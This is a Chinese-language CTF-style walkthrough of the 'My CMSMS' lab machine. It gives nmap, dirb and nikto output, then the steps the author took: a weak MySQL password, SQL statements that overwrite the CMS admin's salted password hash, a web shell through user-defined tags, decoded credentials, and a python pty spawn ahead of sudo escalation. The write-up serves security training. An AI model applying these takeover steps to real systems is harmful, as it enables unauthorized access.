My cmsms

Lad ip

IP: 192.168.1.106

Information

Nnmap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Nmap 7.70 scan initiated Sat Jul 11 09:05:47 2020 as: nmap -v -A -p- -oN info.txt 192.168.1.106
Nmap scan report for 192.168.1.106
Host is up (0.00032s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 27:21:9e:b5:39:63:e9:1f:2c:b2:6b:d3:3a:5f:31:7b (RSA)
| 256 bf:90:8a:a5:d7:e5:de:89:e6:1a:36:a1:93:40:18:57 (ECDSA)
|_ 256 95:1f:32:95:78:08:50:45:cd:8c:7c:71:4a:d4:6c:1c (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-favicon: Unknown favicon MD5: 551E34ACF2930BF083670FA203420993
|_http-generator: CMS Made Simple - Copyright (C) 2004-2020. All rights reserved.
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Home - My CMS
3306/tcp open mysql?
.....
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000

Dirb:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
---- Scanning URL: http://192.168.1.106/ ----
==> DIRECTORY: http://192.168.1.106/admin/
==> DIRECTORY: http://192.168.1.106/assets/
+ http://192.168.1.106/cgi-bin/ (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.1.106/doc/
+ http://192.168.1.106/index.php (CODE:200|SIZE:19422)
==> DIRECTORY: http://192.168.1.106/lib/
==> DIRECTORY: http://192.168.1.106/modules/
+ http://192.168.1.106/phpinfo.php (CODE:200|SIZE:90281)
+ http://192.168.1.106/phpmyadmin (CODE:401|SIZE:460)
+ http://192.168.1.106/server-status (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.1.106/tmp/
==> DIRECTORY: http://192.168.1.106/uploads/

---- Entering directory: http://192.168.1.106/admin/ ----
+ http://192.168.1.106/admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.106/admin/lang/
==> DIRECTORY: http://192.168.1.106/admin/plugins/
==> DIRECTORY: http://192.168.1.106/admin/templates/
==> DIRECTORY: http://192.168.1.106/admin/themes/

---- Entering directory: http://192.168.1.106/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.106/doc/ ----
+ http://192.168.1.106/doc/index.html (CODE:200|SIZE:24)
+ http://192.168.1.106/doc/robots.txt (CODE:200|SIZE:121)

---- Entering directory: http://192.168.1.106/lib/ ----
==> DIRECTORY: http://192.168.1.106/lib/assets/
==> DIRECTORY: http://192.168.1.106/lib/classes/
+ http://192.168.1.106/lib/index.html (CODE:200|SIZE:24)
==> DIRECTORY: http://192.168.1.106/lib/jquery/
==> DIRECTORY: http://192.168.1.106/lib/lang/
==> DIRECTORY: http://192.168.1.106/lib/phpmailer/
==> DIRECTORY: http://192.168.1.106/lib/plugins/
==> DIRECTORY: http://192.168.1.106/lib/smarty/
==> DIRECTORY: http://192.168.1.106/lib/tasks/

Nikto:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.1.106
+ Target Port: 80
+ GET Cookie CMSSESSID2a2f83428536 created without the httponly flag
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ ROSODUEV Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ GET /phpinfo.php: Output from the phpinfo() function was found.
+ GET /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-5034: GET /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-48: GET /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3092: GET /lib/: This might be interesting...
+ OSVDB-3268: GET /tmp/: Directory indexing found.
+ OSVDB-3092: GET /tmp/: This might be interesting...
+ OSVDB-3233: GET /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: GET /icons/README: Apache default file found.
+ GET /admin/login.php: Admin login page/section found.
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ GET The site uses SSL and Expect-CT header is not present.

这里我发现CMS好像是最新版本的,似乎没有可利用的漏洞,然后在想这是不是CTF类型是不是故意把版本号修改了,但是我还是没有往那个方向进行,最开始的思路是觉得从中间件等下手的类型有点少,除非是在实战中多一些,不过=.=试了才发现 Mysql弱口令.
既然是弱口令那么就能 修改密码md5进入后台

Get admin login

弱口令登录mysql,一开始我直接修改了管理员的md5:123456,但是登录的时候提示密码错误,查一下发现可能是密码除了第一层md5还加了一层“盐”

1
update cms_users set password = 'e10adc3949ba59abbe56e057f20f883e' WHERE user_id = '1';

然后改成了这样,就能登录了

1
update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'123456'))) where username = 'admin';

Get Limited Shell

[博文作为笔记的性质=。=我的虚拟机网段又分配在其它的段上了和ova连不上懒得折腾了,就搬其它地方的图进行记录.]
CMS MADE SIMPLE 这个CMS国内也是有漏洞收录的,不过我看到了老外从后台标签getshell的方法
2
接着访问:http://192.168.1.3/index.php?page=user-defined-tags 拿到一个www-data权限的shell

ROOT

在网站根目录/var/www/html发现隐藏文件/admin , /assets
3
得到一串base64 解码得一串base32 然后继续解码 得到用户和密码
4
切换用户和得到pty shell

1
2
su armour
python3 -c 'import pty;pty.spawn("/bin/bash")'
  • sudo提权
    5